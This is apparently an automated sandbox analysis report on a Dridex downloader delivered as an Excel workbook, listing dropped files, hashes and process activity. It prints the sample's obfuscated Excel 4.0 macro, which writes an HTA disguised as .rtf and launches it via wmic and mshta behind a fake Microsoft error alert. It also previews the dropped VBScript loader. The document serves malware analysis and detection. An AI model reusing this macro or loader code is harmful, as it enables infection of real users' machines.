                                                                                                                                                      • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\KBjfhfmoGRoN.rtf, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..N_Z_y_N_H_x_q_R_V_g_S_m_G_x_A = "wm" & "ic" & Chr(32) & "pro" & "ce" & "ss " & "cal" & "l c" & Chr(114) & "ea" & Chr(116) & Chr(101) & Chr(32) & Chr(34) & "ru" & "nd" & "ll3" & Chr(50) & ".ex" & "e " & "" & "C:" & "" & "" & "\\" & Chr(80) & "" & "ro" & "gra" & "mD" & "" & "at" & "" & Chr(97) & "\iu" & "" & "nig" & "" & Chr(103) & Chr(101) & Chr(114) & ".b" & "in " & Chr(71) & Chr(101) & "" & "" & Chr(116) & "NT" & Chr(86) & "er" & "" & Chr(115) & "io" & Chr(110) & "" & "" & "" & Chr(34)..Set r_F_N_z_e_o_v_y_b_F_L_E_Z_I_I_s_w = CreateObject("MS" & "XML" & "2.S" & "er" & "ver" & Chr(88+1-1) & "MLH" & "TT" & "P." & "" & "" & "" & "" & "6." & Chr(48+1-1) & "")....D_l_t_o_e_o_I_s = "" & Chr(87+1-1) & Chr(115+1-1) & "" & "" & "cr" & Chr(105+1-1)
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\01ADB2EA-F935-4368-BB11-72A62EB71B1F
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):140193
                                                                                                                                                      Entropy (8bit):5.357930624059582
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:0cQIfgxrBdA3gBwtnQ9DQW+z2k4Ff7nXbovidXiE6LWmE9:4uQ9DQW+zYXfH
                                                                                                                                                      MD5:0F70AF44C68A731FE2A4CB4CFC6B0384
                                                                                                                                                      SHA1:FA6A29E6122AFD68A225B9E739F85DCC47212DF9
                                                                                                                                                      SHA-256:8D381680FC9830398F03F89122F9D42F398B5012FBC269FBBAC19542E587C9BE
                                                                                                                                                      SHA-512:0A353A6AE59C743301E1F5AEA0F7277F6DDDD3043993A6AC3656EDFC10FCCFD118015628EF197D46879F4F492E729F9285F67B423D52CE188FE2CCEAD2F30A85
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T13:14:11">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A59E5CD4.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 960 x 510, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):69191
                                                                                                                                                      Entropy (8bit):7.944286664628326
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:6fn2pc8EJ8flXchmJQL08Kt2G2G6yv/3GAohPG+rLzrLZu00izn:C2pjE2pWmWfBG7DHG5hpnk0r
                                                                                                                                                      MD5:E1D0A03A4956FF80068F5297E2C4AC15
                                                                                                                                                      SHA1:D59E49A3FD454D9A66CF4F847E1D727CE8A85D0D
                                                                                                                                                      SHA-256:D5A8E7A4BB9D2D6888D2B8BF585C9B7694270C2B41E81A7A3D0D36A291D8AB73
                                                                                                                                                      SHA-512:91C1CEC41468FB589D5AF5FEC969B67F55C15990B14B2E5D77D1BA8037A6C404332B517A8F73EA59BDD0D982C75734F3AAEB0E7A92363C1E1DA3B5B92F35E062
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .PNG........IHDR.............S9go....IDATx...w..E.....&..q...."...(M...E:......?..gG..X.E.B.E...R.I...Uz.....#7K.Kr....y..@.evfvv.;..BJ)ADDDDDDt...u............DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........QD`.LDDDDDD...0......E...DDDDDD..........Q
                                                                                                                                                      C:\Users\user\Desktop\~$Complaint details 143595.xlsb
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.6081032063576088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                      MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                      SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                      SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                      SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      \Device\ConDrv
                                                                                                                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):160
                                                                                                                                                      Entropy (8bit):5.108203110114614
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnSKNJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egSKNeAc
                                                                                                                                                      MD5:FB7DF96A09D1FDF85D1EBAE8E8DD08D6
                                                                                                                                                      SHA1:F783024DF54E7970E67982E2E8689D4522D298E8
                                                                                                                                                      SHA-256:D065CA0F2CC780D394DFE192B15A5A8AA931689AFEEF8ADD0A453241DF535DA9
                                                                                                                                                      SHA-512:29FE3A65E015769190B7CE5EE7636A1E1EDFA578384BCFF41E07BA2A2F8D05EECEDFDDE8739BFBB33AABFC5C59282E799E9E043C66F6D45C46862A67D676F1D4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5716;...ReturnValue = 0;..};....

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                                                      Entropy (8bit):7.884142319689223
                                                                                                                                                      TrID:
                                                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                      • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                      • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                      File name:Complaint details 143595.xlsb
                                                                                                                                                      File size:97313
                                                                                                                                                      MD5:91eca239ee8b604f18f6fb1ed6cde135
                                                                                                                                                      SHA1:78c47637b513d11ba6c36b19b9d79f7ee7a86338
                                                                                                                                                      SHA256:4dea495d5c1c5e0cb56677608b5efa53658cc20bb836f9cccd2aa1092b573aa8
                                                                                                                                                      SHA512:215309e43413c0af9f253c6a4afad0976ff5b5dc808ac97d3f1a418b3ab0edb36e5e3f818037cc8df955e40ed29acdcfb6a4e58966f53f799dd7911b313b0664
                                                                                                                                                      SSDEEP:1536:8pWBzMgiCxKNyqJfn2pc8EJ8flXchmJQL08Kt2G2G6yv/3GAohPG+rLzrLZu00io:b9ne2pjE2pWmWfBG7DHG5hpnk0lcbdA2
                                                                                                                                                      File Content Preview:PK..........!.m\.%............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OpenXML
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Complaint details 143595.xlsb"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:
                                                                                                                                                      Application Name:
                                                                                                                                                      Encrypted Document:
                                                                                                                                                      Contains Word Document Stream:
                                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      0,564,=FOPEN(CHAR(67) & CHAR(58) & CHAR(92) & "Prog" & CHAR(114) & CHAR(97) & "mDa" & CHAR(116) & CHAR(97) & CHAR(92) & "KBjfh" & CHAR(102) & "mo" & CHAR(71) & "RoN.rt" & CHAR(102), 3)
7,564,=A6189+C9603
8,564,=D2684+D9691
10,564,=A6103+C5387
12,564,=B5737+B5514
13,564,=FOR.CELL("aeUnTBjEWBNUVm",Sheet1!BR170:CI439, TRUE)
14,564,=C7642+A4455
19,564,=B5077+A276
21,564,=C2893+D6211
25,564,=D6944+B9715
26,564,=FWRITE(0,CHAR(aeUnTBjEWBNUVm))
31,564,=D7800+A554
33,564,=A4093+A2809
34,564,=D9290+B3087
37,564,=D363+C9448
38,564,=NEXT()
39,564,=D4014+C679
40,564,=C675+D6066
41,564,=A5007+A7167
44,564,=B560+C788
45,564,=B1641+D2073
46,564,=D5403+A8065
47,564,=D142+D8621
52,564,=ALERT(CHAR(69) & "rror!" & CHAR(32) & CHAR(83) & "endin" & CHAR(103) & " rep" & CHAR(111) & "rt to" & CHAR(32) & "Microsoft...")
54,564,=D8970+A8840
55,564,=B2305+A8466
56,564,=C775+D1343
58,564,=A3649+B506
59,564,=D6903+B9200
60,564,=C8055+A9279
61,564,=D7261+A3173
64,564,=EXEC("wmic p" & CHAR(114) & "ocess ca" & CHAR(108) & "l c" & CHAR(114) & "eate " & CHAR(34) & "msh" & CHAR(116) & "a C:\ProgramData\KBjfhfmoGRo" & CHAR(78) & ".rtf" & CHAR(34))
65,564,=D5683+C3157
66,564,=C3674+C336
69,564,=D7419+B1194
70,564,=C2221+C5301
74,564,=RETURN()

                                                                                                                                                      Network Behavior

                                                                                                                                                      No network behavior found

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 2012 Parent PID: 744

                                                                                                                                                      General

                                                                                                                                                      Start time:14:14:08
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: WMIC.exe PID: 6632 Parent PID: 2012

                                                                                                                                                      General

                                                                                                                                                      Start time:14:15:08
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf"
                                                                                                                                                      Imagebase:0xe50000
                                                                                                                                                      File size:391680 bytes
                                                                                                                                                      MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: conhost.exe PID: 3544 Parent PID: 6632

                                                                                                                                                      General

                                                                                                                                                      Start time:14:15:09
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: WmiPrvSE.exe PID: 5268 Parent PID: 744

                                                                                                                                                      General

                                                                                                                                                      Start time:14:15:10
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                      Imagebase:0x7ff629740000
                                                                                                                                                      File size:488448 bytes
                                                                                                                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: mshta.exe PID: 5716 Parent PID: 5268

                                                                                                                                                      General

                                                                                                                                                      Start time:14:15:10
                                                                                                                                                      Start date:02/12/2021
                                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:mshta C:\ProgramData\KBjfhfmoGRoN.rtf
                                                                                                                                                      Imagebase:0x7ff639b00000
                                                                                                                                                      File size:14848 bytes
                                                                                                                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >